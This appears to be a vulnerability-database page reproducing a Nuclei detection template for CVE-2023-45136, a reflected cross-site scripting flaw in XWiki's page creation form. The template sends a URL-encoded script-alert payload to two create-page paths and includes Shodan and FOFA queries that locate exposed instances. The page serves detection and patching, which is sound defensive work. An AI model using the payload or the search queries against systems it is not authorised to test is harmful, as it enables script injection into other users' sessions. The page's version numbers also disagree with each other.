Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-45136HistoryJun 20, 2024 - 10:22 a.m.
XWiki < 14.10.14 - Cross-Site Scripting
2024-06-2010:22:19
ProjectDiscovery
github.com
1
xwiki
cross-site scripting
page creation
9.6 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
6.5 Medium
AI Score
Confidence
High
0.598 Medium
EPSS
Percentile
97.8%
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. When document names are validated according to a name strategy (disabled by default), XWiki starting in version 12.0-rc-1 and prior to versions 12.10.12 and 15.5-rc-1 is vulnerable to a reflected cross-site scripting attack in the page creation form. This allows an attacker to execute arbitrary actions with the rights of the user opening the malicious link.
id: CVE-2023-45136
info:
name: XWiki < 14.10.14 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. When document names are validated according to a name strategy (disabled by default), XWiki starting in version 12.0-rc-1 and prior to versions 12.10.12 and 15.5-rc-1 is vulnerable to a reflected cross-site scripting attack in the page creation form. This allows an attacker to execute arbitrary actions with the rights of the user opening the malicious link.
impact: |
Successful exploitation could lead to cross-site scripting attack.
remediation: |
This has been patched in XWiki 14.10.12 and 15.5-rc-1 by adding appropriate escaping.
reference:
- https://jira.xwiki.org/browse/XWIKI-20854
- https://nvd.nist.gov/vuln/detail/CVE-2023-45136
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-45136
cwe-id: CWE-79
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
vendor: xwiki
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2024,xwiki,xss
http:
- method: GET
path:
- "{{BaseURL}}/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/xwiki/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_all(body, "<script>alert(document.domain)</script>", "data-xwiki-reference")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402202a79398f18d7c34b32acc60b37bbc9f9166e7575618fbb4db65de12e5b677ccd0220018dd12927fdb84708570d206d8c1dee90ed52498ddd43d454415136b29b2cf7:922c64590222798bb761d5b6d8e72950Related
cve
cve
CVE-2023-45136
2023-10-25 20:15:12
prion
prion
Cross site scripting
2023-10-25 20:15:00
github
github
osv
osv
XWiki Platform web templates vulnerable to reflected XSS in the create document form if name validation is enabled
2023-10-25 21:13:37
CVE-2023-45136
2023-10-25 20:15:12
cvelist
cvelist
openvas
openvas
nvd
nvd
CVE-2023-45136
2023-10-25 20:15:12
9.6 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
6.5 Medium
AI Score
Confidence
High
0.598 Medium
EPSS
Percentile
97.8%
Related for NUCLEI:CVE-2023-45136